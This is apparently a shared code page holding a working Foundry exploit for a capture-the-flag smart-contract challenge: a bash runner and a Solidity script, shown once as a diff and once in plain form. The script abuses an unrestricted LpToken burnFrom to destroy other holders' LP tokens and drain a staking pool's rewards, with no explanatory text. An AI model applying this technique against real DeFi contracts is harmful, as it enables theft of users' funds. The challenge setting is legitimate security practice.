KaoRz · June 3, 2024 14:41
diff --git a/exploit.sh b/exploit.sh
 #!/bin/bash

 export $(cat .env | xargs)

 forge script script/Exploitoor.s.sol:ExploitScript --fork-url $CTF_RPC_URL --private-key $PRIVATE_KEY --broadcast
 sleep 10
 forge script script/Exploitoor.s.sol:FinalizeChallenge --fork-url $CTF_RPC_URL --private-key $PRIVATE_KEY --broadcast
diff --git a/Exploitoor.s.sol b/Exploitoor.s.sol
 // SPDX-License-Identifier: UNLICENSED
 pragma solidity ^0.8.13;

 import "forge-std/Script.sol";

 import {Token} from "src/Token.sol";
 import {LpToken} from "src/LpToken.sol";
 import {StakingManager} from "src/StakingManager.sol";

 import {Setup} from "src/Setup.sol";

 contract ExploitScript is Script {

    Setup private setup;

    Token private token;
    LpToken private lptoken;
    StakingManager private stakingmanager;

    function setUp() public {
        setup = Setup(vm.envAddress("SETUP_ADDRESS"));
        token = setup.token();
        stakingmanager = setup.stakingManager();
        lptoken = stakingmanager.LPTOKEN();
    }

    function run() public {
        vm.startBroadcast();

        setup.withdraw();
        lptoken.burnFrom(address(setup), lptoken.balanceOf(address(setup)));

        uint256 initBalance = token.balanceOf(msg.sender);
        token.approve(address(stakingmanager), initBalance);
        stakingmanager.stake(initBalance);
        lptoken.burnFrom(msg.sender, lptoken.balanceOf(msg.sender) - 1e18);
        
        vm.stopBroadcast();
    }
 }

 contract FinalizeChallenge is Script {

    Setup private setup;

    Token private token;
    LpToken private lptoken;
    StakingManager private stakingmanager;

    function setUp() public {
        setup = Setup(vm.envAddress("SETUP_ADDRESS"));
        token = setup.token();
        stakingmanager = setup.stakingManager();
        lptoken = stakingmanager.LPTOKEN();
    }

    function run() public {
        vm.startBroadcast();

        stakingmanager.unstakeAll();
        token.transfer(address(setup), token.balanceOf(msg.sender));
        
        require(setup.isSolved());

        vm.stopBroadcast();
    }
 }
	#!/bin/bash

	export $(cat .env \| xargs)

	forge script script/Exploitoor.s.sol:ExploitScript --fork-url $CTF_RPC_URL --private-key $PRIVATE_KEY --broadcast
	sleep 10
	forge script script/Exploitoor.s.sol:FinalizeChallenge --fork-url $CTF_RPC_URL --private-key $PRIVATE_KEY --broadcast
	// SPDX-License-Identifier: UNLICENSED
	pragma solidity ^0.8.13;

	import "forge-std/Script.sol";

	import {Token} from "src/Token.sol";
	import {LpToken} from "src/LpToken.sol";
	import {StakingManager} from "src/StakingManager.sol";

	import {Setup} from "src/Setup.sol";

	contract ExploitScript is Script {

	Setup private setup;

	Token private token;
	LpToken private lptoken;
	StakingManager private stakingmanager;

	function setUp() public {
	setup = Setup(vm.envAddress("SETUP_ADDRESS"));
	token = setup.token();
	stakingmanager = setup.stakingManager();
	lptoken = stakingmanager.LPTOKEN();
	}

	function run() public {
	vm.startBroadcast();

	setup.withdraw();
	lptoken.burnFrom(address(setup), lptoken.balanceOf(address(setup)));

	uint256 initBalance = token.balanceOf(msg.sender);
	token.approve(address(stakingmanager), initBalance);
	stakingmanager.stake(initBalance);
	lptoken.burnFrom(msg.sender, lptoken.balanceOf(msg.sender) - 1e18);

	vm.stopBroadcast();
	}
	}

	contract FinalizeChallenge is Script {

	Setup private setup;

	Token private token;
	LpToken private lptoken;
	StakingManager private stakingmanager;

	function setUp() public {
	setup = Setup(vm.envAddress("SETUP_ADDRESS"));
	token = setup.token();
	stakingmanager = setup.stakingManager();
	lptoken = stakingmanager.LPTOKEN();
	}

	function run() public {
	vm.startBroadcast();

	stakingmanager.unstakeAll();
	token.transfer(address(setup), token.balanceOf(msg.sender));

	require(setup.isSolved());

	vm.stopBroadcast();
	}
	}